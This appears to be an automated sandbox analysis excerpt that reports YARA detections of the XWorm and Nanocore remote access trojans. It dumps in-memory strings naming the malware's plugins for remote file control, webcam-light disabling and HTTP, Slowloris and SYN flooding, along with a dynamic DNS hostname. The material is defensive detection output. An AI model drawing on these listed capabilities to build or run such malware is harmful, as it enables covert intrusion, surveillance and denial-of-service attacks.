Source: Yara match	File source: 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.airlineagancy.casacam.net 7076.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.3252f80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.1859765201.0000000000282000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1869683888.000000000322A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: airlineagancy.casacam.net 7076.exe PID: 7764, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe, type: DROPPED

Remote Access Functionality

Detected Nanocore Rat

Source: new policy.scr.exe, 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Class10gdelegate0_0gclass0_0gstruct0_0gclass1_0gclass2_0gclass3_0class9_0smethod_0type_0contextValue_0string_0ulong_0bool_0gparam_0cultureInfo_0lastInputInfo_0stringBuilder_0resourceManager_0timer_0uintptr_0memoryStatus_0object_0uint_0ushort_0iclientDataHost_0iclientNetworkHost_0iclientAppHost_0GDelegate0GClass0GStruct0Class11gdelegate0_1class1_1smethod_1string_1ulong_1bool_1cultureInfo_1intptr_1object_1uint_1Class1`1IEnumerable`1ContextValue`1IEnumerator`1List`1GClass1Class12Int32class1_2smethod_2ulong_2intptr_2int_2KeyValuePair`2Dictionary`2GClass2Class13class1_3smethod_3GClass3Class14smethod_4Class4Class15method_5Class5Class16method_6Class6Class17method_7Class7Class18method_8Class8Class19method_9Class9<Module>System.IOTvalue__GetFirstRunDataProjectDatamscorlibSystem.Collections.GenericMicrosoft.VisualBasicGetWindowThreadProcessIdGetProcessByIdAddConnectionStateChangedConnectionFailedPipeClosedPipeCreatedget_BytesReceivedSynchronizedCoreCommandSystemCommandConnectionCommandRoundGetMethodmethodNetworkInterfaceStackTraceCreateInstancedefaultInstanceDivideGetHashCodeget_UnicodeAddRangeChangeBuildingHostCacheEndInvokeBeginInvokeIDisposableRuntimeMethodHandleGetModuleHandleRuntimeTypeHandleGetTypeFromHandleGetProcessHandleToSingleAvailablePageFileTotalPageFileset_WindowStyleProcessWindowStyleget_NameGetApplicationExecutableNameGetClientExecutableNameGetRandomFileNameGetFileNameget_FullNameget_ProcessNameGetNameAssemblyNameGetApplicationFriendlyNameGetClientFriendlyNameStackFrameGetFrameDateTimeOneCombineCommandTypeCheckForSyncLockOnValueTypeget_DeclaringTypeNanoCoreMethodBaseApplicationBaseApplicationSettingsBaseDisposeUpdateMulticastDelegateEditorBrowsableStateCompilerGeneratedAttributeGuidAttributeGeneratedCodeAttributeDebuggerNonUserCodeAttributeDebuggableAttributeEditorBrowsableAttributeComVisibleAttributeAssemblyTitleAttributeStandardModuleAttributeHideModuleNameAttributeAssemblyTrademarkAttributeDebuggerHiddenAttributeAssemblyFileVersionAttributeMyGroupCollectionAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeCLSCompliantAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteget_Valueset_ValueLookupPrivilegeValueGetObjectValueGetValueMoveRemoveget_SizeInitializeSizeOfSystem.ThreadingEncodingToStringMathget_ExecutablePathGetTempPathobjAsyncCallbackTimerCallbackcallbackIClientNetworkTotalPhysicalAvailablePhsyicalMarshalDecimalMicrosoft.VisualBasic.MyServices.InternalAvailableVirtualTotalVirtualAvailableExVirtualSystem.ComponentModelHandleConnectionCommandUninstalladvapi32.dllkernel32.dlluser32.dllCoreClientPlugin.dllObjectFlowControlget_Itemset_ItemSystemEnumBooleanget_MetadataTokenOpenProcessTokenGetPublicKeyTokenMinNanoCore.ClientPluginCoreClientPluginGetIsRunningAsAdminApplicationSystem.Net.NetworkInformationUnicastIPAddressInformationSystem.ConfigurationSystem.GlobalizationSystem.ReflectionUnicastIPAddressInformationCollectionIClientNameObject
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: new policy.scr.exe, 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: Class10gdelegate0_0gclass0_0gstruct0_0gclass1_0gclass2_0gclass3_0class9_0smethod_0type_0contextValue_0string_0ulong_0bool_0gparam_0cultureInfo_0lastInputInfo_0stringBuilder_0resourceManager_0timer_0uintptr_0memoryStatus_0object_0uint_0ushort_0iclientDataHost_0iclientNetworkHost_0iclientAppHost_0GDelegate0GClass0GStruct0Class11gdelegate0_1class1_1smethod_1string_1ulong_1bool_1cultureInfo_1intptr_1object_1uint_1Class1`1IEnumerable`1ContextValue`1IEnumerator`1List`1GClass1Class12Int32class1_2smethod_2ulong_2intptr_2int_2KeyValuePair`2Dictionary`2GClass2Class13class1_3smethod_3GClass3Class14smethod_4Class4Class15method_5Class5Class16method_6Class6Class17method_7Class7Class18method_8Class8Class19method_9Class9<Module>System.IOTvalue__GetFirstRunDataProjectDatamscorlibSystem.Collections.GenericMicrosoft.VisualBasicGetWindowThreadProcessIdGetProcessByIdAddConnectionStateChangedConnectionFailedPipeClosedPipeCreatedget_BytesReceivedSynchronizedCoreCommandSystemCommandConnectionCommandRoundGetMethodmethodNetworkInterfaceStackTraceCreateInstancedefaultInstanceDivideGetHashCodeget_UnicodeAddRangeChangeBuildingHostCacheEndInvokeBeginInvokeIDisposableRuntimeMethodHandleGetModuleHandleRuntimeTypeHandleGetTypeFromHandleGetProcessHandleToSingleAvailablePageFileTotalPageFileset_WindowStyleProcessWindowStyleget_NameGetApplicationExecutableNameGetClientExecutableNameGetRandomFileNameGetFileNameget_FullNameget_ProcessNameGetNameAssemblyNameGetApplicationFriendlyNameGetClientFriendlyNameStackFrameGetFrameDateTimeOneCombineCommandTypeCheckForSyncLockOnValueTypeget_DeclaringTypeNanoCoreMethodBaseApplicationBaseApplicationSettingsBaseDisposeUpdateMulticastDelegateEditorBrowsableStateCompilerGeneratedAttributeGuidAttributeGeneratedCodeAttributeDebuggerNonUserCodeAttributeDebuggableAttributeEditorBrowsableAttributeComVisibleAttributeAssemblyTitleAttributeStandardModuleAttributeHideModuleNameAttributeAssemblyTrademarkAttributeDebuggerHiddenAttributeAssemblyFileVersionAttributeMyGroupCollectionAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeCLSCompliantAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteget_Valueset_ValueLookupPrivilegeValueGetObjectValueGetValueMoveRemoveget_SizeInitializeSizeOfSystem.ThreadingEncodingToStringMathget_ExecutablePathGetTempPathobjAsyncCallbackTimerCallbackcallbackIClientNetworkTotalPhysicalAvailablePhsyicalMarshalDecimalMicrosoft.VisualBasic.MyServices.InternalAvailableVirtualTotalVirtualAvailableExVirtualSystem.ComponentModelHandleConnectionCommandUninstalladvapi32.dllkernel32.dlluser32.dllCoreClientPlugin.dllObjectFlowControlget_Itemset_ItemSystemEnumBooleanget_MetadataTokenOpenProcessTokenGetPublicKeyTokenMinNanoCore.ClientPluginCoreClientPluginGetIsRunningAsAdminApplicationSystem.Net.NetworkInformationUnicastIPAddressInformationSystem.C